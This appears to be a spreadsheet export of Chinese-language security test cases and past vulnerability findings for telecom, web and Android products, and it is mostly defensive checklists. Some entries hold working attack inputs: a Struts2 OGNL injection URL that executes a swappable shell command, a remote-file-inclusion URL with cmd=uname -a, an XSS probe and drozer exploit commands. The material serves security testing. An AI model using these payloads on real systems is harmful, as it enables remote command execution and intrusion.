    <t>1.系统的文件和目录权限是否参考《身份和访问管理安全设计规范》中规则3.2.1【实施指导】中的表格进行设置
2、普通的ftp用户下载私钥文件
3、一般维护级别的用户从数据库里复制敏感数据到外部机器
4、Unix和类Unix系统用户的umask大小
5、（可选）查看包含敏感信息的文件的文件名
6、是否对存放会话文件的目录进行访问限制,对存放会话信息的数据库表做限制
对于终端产品：
7、检查短信发送接口是否进行权限控制
8、是否对终端功能模块的广播机制进行控制，
9、终端是否暴露了某些可能导致对攻击者进行DOS攻击的接口</t>
  </si>
  <si>
    <t>1.用户的个人数据和敏感数据要保存在应用程序目录
2.个人数据所在的文件对其它用户不具备访问权限</t>
  </si>
  <si>
    <t>1、代码中对TLSCompressed.length取值范围是否有做校验；
2、当值大于 2^14 字节时是否报告一个致命的解压缩失败错误。
涉及代码片段：
struct {
 ContentType type;/*same as TLSPlaintext.type */
 ProtocolVersion version;/*same as TLSPlaintext.version */
 uint16 length;
 opaque fragment[TLSCompressed.length];
} TLSCompressed;</t>
  </si>
  <si>
    <t>1、如果存在程序帐号，访问程序帐号修改口令的界面，为某程序帐号设置新口令，系统是否要求输入旧口令，并验证旧口令是否正确。
需要测试修改口令的常见操作员参见“程序帐号的口令长度测试”-不限于人机接口/可远程访问的机机接口/内部接口涉及的口令</t>
  </si>
  <si>
    <t>1.启动WSDigger工具
2.点击右下角的“Next”按钮
3.在WSDL输入框中输入接口的WSDL的URL地址（如：http://PortalIP:Port/Path/Interface?wsdl）
4.点击“Get Methods”按钮，获取接口方法
5.左侧将列出接口方法，点击需要测试的接口
6.在“Input”栏中输入无权操作该方法的用户名与密码
7.点击“Invoke”按钮
8.查看“Output”栏中的返回信息，是否调用成功。
备注：此操作也可以使用SOAPUI/restClient工具。</t>
  </si>
  <si>
    <t>1.Web Service运行正常
2.已知WSDL地址
3.已知每个接口方法返回结果的含义</t>
  </si>
  <si>
    <t>1.目标应用运行正常
2.系统存在使用客户端输入作为创建数据的功能。</t>
  </si>
  <si>
    <t>构造恶意 URL，并作为嵌入文件的一部分处理：
http://www.example.com/uptime.php?pin=http://www.example2.com/packx1/cs.jpg?&amp;cmd=uname%20-a</t>
  </si>
  <si>
    <t>1.系统正常运行
2.系统支持SSI指令
3.Web 应用程序将使用这些数据建立一个动态产生的页面</t>
  </si>
  <si>
    <t>1.使用系统管理员登录系统，并锁定用户
2.退出系统管理员登录；
3.使用其它管理员登录系统对被锁定用户解锁</t>
  </si>
  <si>
    <t>打开密码找回功能的页面，对密码找回功能进行如下检查：
   1.如果没有对用户的合法身份进行任何验证就发送密码，则说明存在漏洞。
   2.系统正常需要用户输入一些能够证明其合法身份的信息（比如回答一些原来注册用户时填写的一些信息，比如小学教师姓名等），如果是回答问题的方式，则判断问题是否类似于“我的生日”或“我的姓氏”这种答案限定范围非常小的问题。如果是说明存在漏洞，完成测试，否则进行下一步。
   3.如果为输入密码的方式，则查看该页的html源代码， 在html源代码中查看是否存在着可能为密码的数据，如果是，说明存在漏洞
   4.用户的密码一般通过用户邮箱或者手机短信的方式来通知用户，如果在返回的Web页面直接显示明文口令，则说明存在漏洞。</t>
  </si>
  <si>
    <t>1.访问所有带有验证码的登录页面；
2.在登录界面填入错误的用户名和口令，填入错误的验证码，提交表单；
3.使用WEB代理工具拦截响应消息，查看系统响应消息及返回的提示信息。</t>
  </si>
  <si>
    <t>1.被测目标系统正常运行
2.通过最新版本的Nessus工具扫描系统,并生成报告</t>
  </si>
  <si>
    <t>1.登陆被测系统，进入命令行模式
2.获取set-UID和set-GID恶意程序的shell命令如下：
for PART in `awk '($6 != "0") { print $2 }' /etc/fstab`; 
do find $PART \( -perm -04000 -o -perm -02000 \) -type f -xdev -print
done
我们期望结果列表为空</t>
  </si>
  <si>
    <t>业界标准 (DT)Req 3.37-5 一台服务器的所有接口的IPv4地址和IPv6地址必须静态配置。
The IPv4 and IPv6 addresses of all interfaces of a server must be configured statically.</t>
  </si>
  <si>
    <t>1、使用了公司推荐的安全随机函数来生成会话标识的，则认为是安全的；
2、使用了生成会话的安全配置的，则认为是安全的；</t>
  </si>
  <si>
    <t>1.网络正常
2.目标系统运行正常
3.通信矩阵文档正确</t>
  </si>
  <si>
    <t>1、存在用户授权的机制
2、存在提醒用户风险的机制
3、存在有效存储用户授权凭证并达到用户无法抵赖的机制
4、存在数据主体拒绝的机制</t>
  </si>
  <si>
    <t>1、查找到提供用户录入个人数据的功能后进行数据录入
2、检查是否存在查询、更新、删除个人数据的功能，并检查在隐私声明里面或帮助文档或操作指南是否告知了数据主体进行查询、更新、删除的方式。
3、检查查询、更新、删除个人数据的功能是否可以随时使用，并且使用时无障碍限制，如收费等。
3、检查2中提供的功能是否有身份验证的机制。</t>
  </si>
  <si>
    <t>1、检查LBE是否提示应用后台定位。如无提示，则测试通过。如有提示，需检查在手机管家提示前，应用本身是否事前提示用户后台定位（可以通过弹框的方式或者在用户协议中声明）。如无提示则测试fail
注意：定位包括GPS定位、小区基站定位、网络定位，若包含以上定位功能，需要在用户协议中或弹框提示中分别说明，或者统一提示为“获取位置信息”。不能出现通过小区基站定位和GPS定位而只提示GPS定位的情况
3、如果应用真正退出，则测试通过
4、LBE不会弹出后台定位提示</t>
  </si>
  <si>
    <t>人工测试 + 访谈确认：
1、确认客户端是否存在恶意广告、吸费陷阱、与恶意消耗用户流量的行为
2、使用客户端中可能涉及到资费的功能，如VOIP、短彩信，查看是否有提示用户关于资费的信息。
3、对客户端进行流量专项测试
4、检查有大流量文件下载时，需要在界面提示用户，确认是否做此项操作。</t>
  </si>
  <si>
    <t>1.获取到源代码。
2.使用RSA加密算法。</t>
  </si>
  <si>
    <t>目的和意义：
学术界和业界针对RSA的“低公钥指数”（如：e=3）的密码攻击已经十分成熟，如果公钥指数选择不当，攻击者将较为容易的解密密文
子检查项：
1、Openssl调用RSA_generate_key函数生成密钥对时，第二个参数（公共指数）禁止设置为3
2、如果调用iPSI，开发人员是否参考了iPSI《Cryptography Developer Guide》提供的的官方例子，而不是将e设置成3</t>
  </si>
  <si>
    <t>1、敏感信息在产品中要加密保存。在不需要还原的场景，必须采用不可逆的加密算法。
2、禁止使用私有加密算法（包括用base64编码实现的伪加密）。
3、产品使用的加密算法复杂度要符合要求（sha256、aes256等）。</t>
  </si>
  <si>
    <t>1、系统中存储密钥
2、能获取到密钥存储文件</t>
  </si>
  <si>
    <t>密钥即相关信息在存储时被恶意篡改，将导致解密出的数据错误，如果应用系统使用错误的解密结果或被篡改的敏感数据进行数据处理，将可能使程序进入不可预期的运行状态，损害应用程序的正常运行。
检查项（本检查项为规范建议，产品可根据实际业务场景或客户需求分析是否符合要求）：
1、密钥在本地加密时是否进行MAC校验或数字签名
2、密钥材料和密钥组件在本地存储时是否进行MAC校验或数字签名</t>
  </si>
  <si>
    <t>1、手机root
2、被测应用有连接外网的权限，数据业务开启或连接wifi
3、获取手机的个人数据信息：IMEI号、SN号、IMSI号、ESN号、MEID号、电话号码、电话本、短信、email、通话记录、定位信息、模块登陆账号和密码信息、PIN码、PUK码</t>
  </si>
  <si>
    <t>1、通过adb pull命令导出被测应用apk，使用getManifest工具导出AndroidManifest.xml，检查该文件中uses-permission标签是否申请了android.permission.WRITE_EXTERNAL_STORAGE
2、使用被测试的应用XXX各个功能一段时间（尽可能覆盖所有功能，为了保证在内外部SD卡生成数据），检查是否在内置SD卡或者外置SD卡上存储敏感数据，可以和开发确认，申请WRITE_EXTERNAL_STORAGE权限的业务场景尽力覆盖。</t>
  </si>
  <si>
    <t>1、在cmd命令行中执行jarsigner  -verify  -verbose  -certs  D:\XXX.apk
2、检查结果中的签名信息</t>
  </si>
  <si>
    <t>2、能安装成功
3、能安装成功</t>
  </si>
  <si>
    <t>1、查找产品代码中的登陆认证流程。
2、看是否存在特定的操作或超级口令等隐秘通道可以直接绕过登陆认证过程，直接登陆成功。（常见的隐秘通道有：组合键、鼠标特殊敲击、连接特定接口、使用特定客户端、使用特殊URL、根据代码中写死的字符串做认证凭证。）
备注：此检查项也可以结合对开发人员的访谈进行。</t>
  </si>
  <si>
    <t>1、系统可选配置CRL使能功能。
2、步骤2可以协商通过。
3、步骤3、4协商不过。</t>
  </si>
  <si>
    <t>访谈：
1.根据产品提供的接口说明文档，通过调用和人工访谈的方式获取接口的认证方式
2.检查模块间通信以及产品对外通信接口是否有接入认证机制：
测试方法：访谈orSE确认or产品实际功能测试工具测试</t>
  </si>
  <si>
    <t>1、所有非查询类操作（含处于隐藏模式下的命令、参数、生产调测命令等）必须有日志记录
2、所有能对系统进行管理的逻辑通信端口/协议（标准协议没有认证的例外）所有的用户操作进行日志记录
原则：日志是安全事件发生后，问题溯源和问责的的重要证据。对于非查询类操作（如修改、删除），如不记录日志，一旦发生安全事件，华为难以免责</t>
  </si>
  <si>
    <t>1、产品环境可用。
2、支持snmp协议。</t>
  </si>
  <si>
    <t>使用通用数据库（如：Oracle、DB2、SQLServer、Sybase等）的产品在GA后，应保证：
1.产品补丁计划中应包含数据库安全补丁发布计划（至少一年一次）。
2.Support网站上发布相应的补丁。</t>
  </si>
  <si>
    <t>检查数据库的运行权限是否为超级管理员（root/administrator）。检查方法如下：
Linux：
1.登录操作系统，查看数据库进程信息：ps -ef|grep mysqld；
2.如果数据库进程使用root用户运行，说明存在问题。
Windows：
1.登录操作系统，在cmd中输入“services.msc”命令打开服务管理器；
2.选择数据库服务名称，右键属性，查看“登录”选择；
3.如果登录身份为“本地系统账户”，说明存在问题。</t>
  </si>
  <si>
    <t>1.数据库稳定运行.可达，各种业务都运行正常
2.测试主机上安装了数据库连接工具</t>
  </si>
  <si>
    <t>1、通过访谈或查看产品资料的日志部分，看产品支持的日志种类和级别。
2、登陆设备，尝试各种涉及系统安全性的操作，例如：新建用户、关闭某些安全检查功能、通过暴力破解使账号锁定等。
3、查看系统日志，看上述操作是否有清晰的日志记录，并确认日志级别是否满足要求（不会因为日志级别低而导致管理员容易忽略）。</t>
  </si>
  <si>
    <t>1、SFTP用户登陆之后仅能访问固定的目录；
2、SFTP用户对访问目录的文件有固定的权限，且对上传文件类型有固定的限制。</t>
  </si>
  <si>
    <t>1、在产品源码中搜索危险函数，看是否已经替换成相应的安全函数。
备注：常见危险函数：memcpy、memmove、memset、strcpy、strncpy、strcat、strncat、strtok、sprintf、snprintf、fscanf、scanf、sscanf、gets等。</t>
  </si>
  <si>
    <t>1、成功验证用户信息后，直接给用户提供重置密码页面或发送一条重置口令的URL，而不是发送明文口令给用户。
2、“安全问题”在系统内部使用hash加盐的方式存储。</t>
  </si>
  <si>
    <t>1、在命令行操作界面，执行口令、密码等相关命令，看是否明文显示输入的敏感信息。
2、使用向上键或向下键查看历史命令，看口令、密码等敏感信息是否明文回显。</t>
  </si>
  <si>
    <t>1.需要重新设定该帐号的有效开始时间；
2.需要重新设定该帐号的有效结束时间。</t>
  </si>
  <si>
    <t>1、打开系统自带的浏览器，输入网址：http://drops.wooyun.org/webview.html
2、进入网页，检查页面显示</t>
  </si>
  <si>
    <t>HCSEC-1039-1029 The pins of the USB connector showed some activity during device insertion, suggesting that some vestiges of USB support remain on the HG8240.
HCSEC-1039-1028 The JTAG interface remains active despite the internal connector being removed.  This may allow an attacker to access to the SD5113 ASIC and its attached devices (e.g. Flash ROM and Ethernet Switch).
The HG612 PCB includes silkscreen markings which highlight the pinout of both JTAG and UART connectors.</t>
  </si>
  <si>
    <t>问题1（致命）：通过代码review和APK反编译，都可以看到ATlock.apk应用明文密码日志打印。
问题2（致命）：对于终端类产品，蓝牙模块中存在明文打印关键键值及修改人信息等问题。
问题3（致命）：对于终端类产品，wifi直连传输数据的时候，内容都是明文传输的。测试场景：手动创建一个txt文本，文本内容为：hello, test for wifi direct connecttion.测试过程：将两台手机通过wifi直连传输准备好的txt文本文件，并使用tcpdump抓包，查看抓到的包中传输内容是否是明文显示的。测试结果：传输内容为明文显示。建议：wifi传输数据时应该加密传输，否则wifi信号被截取容易造成信息泄漏。
问题4（致命）：对于终端类产品，华为weatherClock中用户地域切换时明文打印基站区域码，存在用户行踪的风险。建议：日志默认不允许打印敏感数据，如必须打印敏感数据需对日志文件提供保护机制（如访问控制、加密、匿名化处理等）。
问题5（致命）：对于终端类产品，代码review发现存在log明文输出imsi号的情况。
问题6（致命）：日志中有虚拟机vnc用户名和密码。
问题7（致命）：1、修改主机登录密码时，FM UI前台会使用从后台获取的RSA公钥对旧密码和新密码进行加密，并将加密后的新旧密码发给FM 后台，通过查看前台日志信息，日志存在打印RSA公钥、加密后的新旧密码信息，如果通过修改主机密码成功，从日志中获取加密后的新密码信息，通过RSA公钥信息可以在不知道主机密码的情况下修改主机密码。
问题8（致命）：FC部件自动备份日志中/var/log/galaxenginelog/gms/cronBackUpload.log，存在密码明文打印。
问题9（致命）：VOIPConfigParamsData.java将用户名密码传输至协议栈：buffer.append("&lt;password&gt;"+voipPassword+"&lt;/password&gt;"+linebreak)，协议栈平台打印出明文密码，通过logcat产看结果，AccountLogin:&lt;password&gt;12345678&lt;/password&gt;。
问题10（致命）：SOL调试接口下对用户输入输出全盘打印，包含账号和口令。
问题11（致命）：WIFI直连导入联系人，将交互的联系人信息临时保存在SD卡，导入完毕即删除，方案不够安全。1）攻击者如果不在导入联系人执行时间内，通过USB或者读取SD卡目录，不能够获取到联系人信息。2）攻击者如果知道“在导入联系人过程中会产品临时文件”通过制造一个恶意APK实时的读取SD卡的WIFI直连联系人目录，依然可以获取到联系人信息，只是触发场景要求比较苛刻，但仍然存在安全风险，建议通过contentProvider对外共享数据，并添加被访问权限的业界通用做法方式。
问题12（致命）：话单中明文打印用户短信内容。
问题13（致命）：问题描述eCare用户登录时，eCare后台日志eCare.log的soap报文中，明文打印客户信息，包括手机号、身份识别ID。
问题14（致命）：在客户端的server日志中搜到了明文的用户名、密码。
问题15:（致命）：产品OMS客户端记录的服务器日志中，通过此客户端所有开户的SIM卡信息（含IMSI、KI值、OP值）都明文显示在客户端日志中，同时大量SessionID被打印出来，且SessionID很简单，未作加密处理。建议：请加密处理日志文件，或匿名化个人数据，或全部删除日志中的所有敏感数据，确保用户个人数据无法以任何形式还原。
问题16（致命）：对于终端类产品，1、浏览器应用明文打印书签信息2、明文打印书签目录信息，存在安全目录暴露风险。
问题17（致命）：WIFI直连应用（HwWiFiDirect），导入联系时将联系人信息永久暴露在SD卡存储区，没有对联系人文件进行访问控制和加密保护，文件永久存在，容易被恶意应用读取和篡改。
问题18（严重）：呼叫禁制功能修改密码，日志明文打印旧密码和修改的新密码，容易造成敏感信息泄露，存在安全风险。 oldPassword:为日志打印的旧密码  ，newPassword:为日志打印的新密码 代码实现如下：文件：\mediatek\settings\ CallBarringChangePassword.java    private void doChangePassword(String oldPassword, String newPassword) {if (DBG) { Xlog.d(LOG_TAG, "doChangePassword() is called with oldPassword is " + oldPassword + "newPassword is " + newPassword); } ....}
问题19（严重）：对于终端类产品，bluetooth 蓝牙模块打印电话号码。
问题20（严重）：在svp sftp日志文件中明文记录了超级管理员的用户密码，问题产生的原因是由于每次登录时，会调用打扫记录用户名及口令，并明文记录在日志中以用于开发定位问题，在这个版本中忘记去除。</t>
  </si>
  <si>
    <t>1、是否自行设计的密码算法或使用未公开算法细节的算法；
2、是否自行对标准密码算法进行改造并使用；
3、是否使用自行定义的通过变形/字符移位/替换等方式执行的数据转换；
4、是否使用编码的方式（如Base64编码）实现数据加密目的；
5、是否使用差错控制编码（如奇偶校验、CRC）实现完整性校验。</t>
  </si>
  <si>
    <t>问题1（致命）：在open_session_req_proc函数中可以看到生成会话ID的代码，是0x88888800或上通道ID，总共只允许5个通道ID，会话ID为0x88888800~0x88888804。使用ipmitool发送命令抓包也可以看出来。而且在后续数据处理中，可以看到程序根本就不检查sessionID是否正确，只获取sessionID的最低字节，即通道ID，用于在g_SessionTable中索引获取信息。
问题2（严重）：发现所有的页面会话ID都是同一值的重复，而不是随机数。这样攻击者将可以非常容易的猜测其他用户或管理员的会话ID，从而劫持受害者的会话.
问题5（一般）：使用rand()生成sessionID。</t>
  </si>
  <si>
    <t>1、在登录界面或者修改口令界面中，禁止在界面上明文回显输入的口令
2、使用交互式命令行参数时，禁止在界面上明文回显输入的口令
3、是否在程序的错误提示信息中明文显示口令
4、是否在调试信息中明文显示口令
5、是否使用查看历史命令（如：方向健或history）的方式显示口令</t>
  </si>
  <si>
    <t>1.检查系统的详细设计文档，是否使用到随机数的函数，如果有，检查是否符合如下规则：
1.Windows环境下使用CryptGenRandom来生成随机数。
2.Unix、Linux环境下从名为/dev/random或者/dev/urandom的设备中读取从而得到随机数。
3.Java中使用类java.security.SecureRandom来生成随机数。</t>
  </si>
  <si>
    <t>1.分析系统中所涉及密码的检查点
2.在各个检查点构造相关的密码信息</t>
  </si>
  <si>
    <t>问题1（一般）：upf数据库证书私钥明文保存，有替换机制。
问题2（一般）：iPortal Https的服务端证书私钥明文存储。</t>
  </si>
  <si>
    <t>1.检查是否有数据保存在公共目录中
2.使用第三方程序修改公共目录数据
如：用户使用华为账号登陆后，设置的头像保存在公共目录/storage/emulated/0/huawei/healthcloud/photos/headimage/headImg_ed0e0c46680603e7a11501b4b41f7e76863170fdbf4726583a54a77819690ac3.jpg</t>
  </si>
  <si>
    <t>1、客户端建立最大连接数（根据服务器支持的数量设置）个SSL连接
2、启用客户端所有功能（所有跟踪、面板、CPU内存监控等都启用到极限）
3、查看CPU使用率，内存占用率
4、查看系统日志</t>
  </si>
  <si>
    <t>1.网元运行正常
2.LMT与网元连接正常</t>
  </si>
  <si>
    <t>1、若没有收到表示没有按照RFC实现来完成。
2、收到消息后连接断开</t>
  </si>
  <si>
    <t>1、检查记录层分段代码：TLSTextplain.fragement长度是否有数值限制。
struct {
           ContentType type;
           ProtocolVersion version;
           uint16 length;
           opaque fragment[TLSPlaintext.length];
} TLSPlaintext;</t>
  </si>
  <si>
    <t>场景一：登录后
1、检查系统是否在用户登录成功后才提供修改口令功能；
场景二：登录前
1、客户端提交的修改口令消息中是否包含被修改帐号的旧口令；
2、检查登录前的修改口令界面是否有验证码；
3、检查登录前的修改口令功能是否有次数限制；
4、检查登录前的修改口令消息是否采用加密传输方式；
5、检查应用系统是否先对旧口令进行认证成功之后，才进行修改口令的处理</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.已知Web服务器域名或IP地址
3.测试用机安装了httprint（Windows环境）</t>
  </si>
  <si>
    <t>1.启动WSDigger工具
2.点击右下角的“Next”按钮
3.在WSDL输入框中输入接口的WSDL的URL地址（如：http://PortalIP:Port/Path/Interface?wsdl）
4.点击“Get Methods”按钮，获取接口方法
5.左侧将列出接口方法，点击需要测试的接口
6.在“Input”栏中为各输入参数赋异常的值，如&lt;script&gt;alert(111)&lt;/script&gt;
7.点击“Invoke”按钮；
8.查看“Output”栏中的返回信息，是否提示输入参数错误，或者返回参数错误对应的返回码。
备注：此操作也可以使用SOAPUI/restClient工具。</t>
  </si>
  <si>
    <t>1.Web Service运行正常
2.已知WSDL地址http://PortalIP:Port/Path/Interface?wsdl
3.已知每个接口方法返回结果的含义</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.获取系统管理员信息，且可以查询个人信息。</t>
  </si>
  <si>
    <t>1.目标应用运行正常
2.系统存在使用客户端输入作为日志处理的数据。</t>
  </si>
  <si>
    <t>1.进入登录页面
2.输入如下语句：
http://www.xxx.com/login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&amp;(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&amp;('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&amp;(g)(('\43mycmd\75\'id\'')(d))&amp;(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&amp;(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&amp;(j)(('\43myres\75new\40byte[51020]')(d))&amp;(k)(('\43mydat.readFully(\43myres)')(d))&amp;(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&amp;(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&amp;(n)(('\43myout.getWriter().println(\43mystr)')(d))
其中'\43mycmd\75\'id\''为执行的命令，可换成其他。如果该页面存在漏洞，斜体部分为可更换部分。</t>
  </si>
  <si>
    <t>1.应用运行正常
2.系统使用PHP技术querystring进行传值</t>
  </si>
  <si>
    <t>1.系统运行正常
2.已经登录系统，且系统存在注销功能</t>
  </si>
  <si>
    <t>1.使用系统管理员帐号登录系统
2.访问应用的配置界面，检查“长时间未解锁自动删除操作员帐号”是否可配置。
3.“长时间未解锁自动删除策略”，该时间段可配置，取值范围：0-99 天，当取值为 0 时，表示不执行自动删除策略，建议默认：30 天。</t>
  </si>
  <si>
    <t>1.登陆网站， 进入密码修改页面
2.查看是否必须提交正确旧密码，如果不需要则存在漏洞
3.填写并提交修改密码数据，并以Web代理工具拦截修改密码请求，观察新旧密码是否通过同一个HTTP请求提交到服务器，如果不是则存在漏洞；</t>
  </si>
  <si>
    <t>1.Web业务正常运行
2.系统提供密码重设或密码找回的功能
3.已知系统正确的账号</t>
  </si>
  <si>
    <t>连续登录失败锁定次数可配置
注：如果已经通过验证码防止帐号口令的暴力破解，那么，不强制遵循本条要求。</t>
  </si>
  <si>
    <t>1.访问带有验证码的页面；
2.右键点击验证码，在弹出右键菜单中选择“属性”；
3.在弹出的属性窗口中拷贝验证码图片所对应的完整的地址URL（例如：http://10.71.99.12:8080/training/public/getcode.jsp?code=1234）。
4.将3步中的URL和参数添加到验证码识别工具VerifyCode.exe（w3可下载）进行识别，如果正确识别率超过5%，说明验证码容易遭受破解。</t>
  </si>
  <si>
    <t>1.打开登录界面，输入用户名，密码，验证码等，并提交登录
2.使用WEB代理工具拦截登录消息，存在验证码的情况下，将验证码删除
3.提交请求，观察服务端响应。</t>
  </si>
  <si>
    <t>1、CodeCC扫描和人工代码走读均没有发现下列危险的情况说明安全：
   1）、Openssl里的对称算法标识（如：EVP_aes_128_ecb()）包含"ecb"字样
   2）、iPSI里的对称算法标识（如：ALGID_AES256_ECB()）包含"ecb"字样
   3）、Java里Cipher.getInstance("AES")，其中"AES"使用默认的ECB模式
   4）、Java里Cipher.getInstance("AES/ECB/NoPadding")包含"ecb"字样
2、Nmap加载加密算法插件也没有扫描相关的问题，说明安全；</t>
  </si>
  <si>
    <t>1、工具使用：
   1）使用CodeCC中的Fortify和Coverity，能扫出部分加密算法问题的代码；
   2）使用Nmap调用加密算法的套件，能扫出部分加密算法的问题；
2、人工代码走读：
   1）、使用Souce Insight搜索禁止使用的C标准库函数random()、rand()
   2）、使用Souce Insight搜索禁止使用Java的java.util.Random类
   3）、使用使用Souce Insight搜索java.security.SecureRandom()是否每次都设置了相同的种子，这将导致每次产生的随机数都一样
   4）、使用Souce Insight分析生成随机数长度是否超过24个字符（或192bits）
子检查项：
1、禁止使用C标准库函数random()、rand()生成随机数用于安全用途
2、禁止使用Java的java.util.Random类生成随机数用于安全用途
3、使用java.security.SecureRandom()产生随机数时，禁止每次都设置了相同的种子，这将导致每次产生的随机数都一样</t>
  </si>
  <si>
    <t>1、检查为第三方提供用户数据的特性是否是必须的。
2、检查对于需要为第三方提供用户数据的必须功能或特性是否有要求用户进行授权的机制、提醒用户风险的机制以及存储用户授权凭证的机制。对于销售给运营商/企业客户的产品，检查需要将数据共享给第三方时是否有要求获得运营商/企业客户的授权的机制、提醒客户风险的机制以及存储客户授权凭证的机制。
3、对于存在为第三方提供用户数据的必须功能或特许，检查是否存在数据主体拒绝将数据提供给第三方功能或特性</t>
  </si>
  <si>
    <t>1、检查LBE是否提示应用后台录音。如无提示，则测试通过。如有提示，需检查在LBE提示前，应用本身是否事前提示用户后台录音（可以通过弹框的方式或者在用户协议中声明）。如无提示则测试fail
3、如果应用真正退出，则测试通过
4、LBE不会弹出后台录音提示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</si>
  <si>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4、放置15分钟，在其间进行灭屏亮屏、休眠唤醒、网络断开再连接等操作，观察LBE是否可以检测出后台定位行为</t>
  </si>
  <si>
    <t>1、检查LBE是否提示应用后台发送短信/彩信。如无提示，则测试通过。如有提示，需检查在LBE提示前，应用本身是否事前提示用户后台发送短信/彩信（可以通过弹框的方式或者在用户协议中声明）。如无提示则测试fail
3、如果应用真正退出，则测试通过
4、LBE不会弹出后台发送短信/彩信提示</t>
  </si>
  <si>
    <t>1.获取到源代码。
2.使用非对称加密算法，如RSA。</t>
  </si>
  <si>
    <t>采用密钥组件方式生成根密钥时，密钥组件的安全性是根密钥的基础，如果密钥组件被攻击者获取，根密钥将可以被轻易的还原。保存密钥组件的文件名应该尽可能一般，这样即使攻击者突破了系统的访问控制，可以访问系统中的文件，也难以从大量的文件中轻易辨别出存放密钥组件的文件，这将给攻击者获取密钥材料增加困难。检查密钥组件文件名是否符合要求：
1、密钥组件的文件名是否包含“加密算法、密钥长度、密钥组件序号、密钥组件总数、密钥名称、组件名称、密钥组件构成、与其它密钥组件的关系、加密模式、域参数”等信息。（如：Key_AES128_Component3）</t>
  </si>
  <si>
    <t>1、连接电脑，用TCPDump抓IP LOG
2、正常使用XX应用的每个功能，同时进入adb shell，输入：busybox netstat -a -p -t -u -l -w -e，记下这个应用对应的服务器IP地址
3、分析IP log是否包含了预制条件3中的个人数据或敏感数据（中国区的IMEI和SN暂不算在个人数据中），若无预制条件3 中的个人数据或敏感数据，则不用进行步骤4
4、分析IP log中包含的预制条件3中的个人数据或敏感数据是否采用安全通道传输或加密后传输</t>
  </si>
  <si>
    <t>1、如果没有申请android.permission.WRITE_EXTERNAL_STORAGE，说明不能在内外部SD卡生成数据，直接pass。否则继续下面的测试
2、应用没有在内置SD卡或者外置SD卡上存储敏感数据</t>
  </si>
  <si>
    <t>2、对自研的应用，有这样的签名信息：      X.509, EMAILADDRESS=mobile@huawei.com, CN=AndroidTeam, OU=TerminalCompany, O=Huawei,
 L=Shengzhen, ST=Guangdong, C=CN；不能出现debug的签名（签名信息中含有debug字样，如CN=Android Debug等）。姓名、部门或公司名称这三项中需保证至少有一项不为空，且需保证所填信息真实有效，不能为网址、乱码等无效信息。（且对于非谷歌官方的应用，不得采用Android公开证书，即出现类似这些信息：Android/emailAddress=android@android.com）</t>
  </si>
  <si>
    <t>1、反编译apk软件包，使用search and replace检查代码中敏感字符串（user、userid、username等）
2、结合开发人员人工访谈&amp;分析
3、代码走读
具体测试方法可以参考文档《未公开接口测试方法指导》。</t>
  </si>
  <si>
    <t>必须同时满足以下所有条件：
1.产品配套有接口说明文档，包含所有对内对外接口的说明（说明信息必须包含接口用途、格式、调用方法等）
2.禁止不经认证直接访问：
1）接口必须提供认证机制，且认证必须默认为开启状态
2）外部接口不允许采用IP弱认证，内部接口如果采用IP弱认证，则必须保证日志能够记录准确的IP信息</t>
  </si>
  <si>
    <t>1.LDAP中字符*是一个通配符，输入*未返回大量LDAP查询结果。
2.大量的闭括号输入并未导致出现无法匹配的闭括号，未破坏LDAP查询语法。
3.针对错误输入，LDAP查询服务并未返回异常结果。</t>
  </si>
  <si>
    <t>1.检查使用通用数据库的产品GA后的补丁计划中是否包含数据库安全补丁发布计划（至少一年一次）。
2.检查产品在Support网站上是否发布了相应的数据库安全补丁。</t>
  </si>
  <si>
    <t>1.数据库稳定运行、可达，各种业务都运行正常
2.测试主机上安装了数据库连接工具</t>
  </si>
  <si>
    <t>1、 Web业务运行正常
2、 已知待测目标URL，假设为http://www.exmaple.com/page.xxx
3、 待测目标存在参数输入，假设为name=value 
4、 测试用机安装了sqlmap测试工具</t>
  </si>
  <si>
    <t>1.提示创建失败，理由是目录层级过高。
2.SFTP账户创建成功。
3.不能成功打开目录，提示没有权限。</t>
  </si>
  <si>
    <t>1、使用已有SFTP账号密码登陆系统；
2、使用cd命令看能否进入系统其他目录；
3、使用get命令看能否将包含重要信息的文件下载到本地；
4、使用put命令看能否上传任意文件至系统；
5、使用delete、mdelete、rmdir等命令，看能否删除系统重要文件或重要目录。</t>
  </si>
  <si>
    <t>1.步骤3中无法正常访问，系统提示重新登录；
2.步骤4中可以正常访问。</t>
  </si>
  <si>
    <t>1、尝试使用系统提供的“忘记密码”功能，看所有信息验证通过后，是否通过email或短信发送明文口令给用户。
2、对于使用“安全问题”验证用户身份的方法，查看系统内部“安全问题”是否明文存储（可以结合查看相关文档说明）。</t>
  </si>
  <si>
    <t>1、管理员可以查看在线用户信息，且显示的信息可以明确区分不同的用户。
2、管理员可以强制其他用户下线。</t>
  </si>
  <si>
    <t>1.创建一个帐号，并通过数据库修改使其有效期过期，然后锁定它；
2.以系统管理员登录，访问解锁界面，对该帐号进行解锁；
3.检查解锁过程中是否“需要重新设定该帐号的有效开始时间”；
4.检查解锁过程中是否“需要重新设定该帐号的有效结束时间”。</t>
  </si>
  <si>
    <t>1、在cmd窗口中输入adb  forward  tcp:31415  tcp:31415
2、输入安装drozer的绝对路径c:\drozer\drozer.bat  console  connect
3、将查找出的暴露组件存储到D盘下exploits.txt文件中：run robber.comps.exploits &gt; D:\exploits.txt 
4、查找出以!Exploit EXSIST:开头的暴露组件，评估该暴露组件的风险
备注：参考此工具目录下的《Mercury工具使用小结》。</t>
  </si>
  <si>
    <t>问题1（一般）：WI登陆前后Sessionid固化。
问题2（一般）：同一个终端PC，不同的用户临时认证的情况是普遍存在的。如果不同的用户登录，sessionid不会改变。先登录的用户有机会获取到sessionid，并在其他机器仿冒后登录的用户。</t>
  </si>
  <si>
    <t>问题1（致命）：通过串口登陆到单板查看口令加密方式，没有采用不可逆加密算法进行保存。
问题2（致命）：查看配置文件中PPP账号、密码，发现密码明文存储。
问题3（致命）：在 \HUAWEI\cgp\workshop\omu\data\tablespaces\cgp_1\16384 这个目录下保存有明文密码及加密后的密文
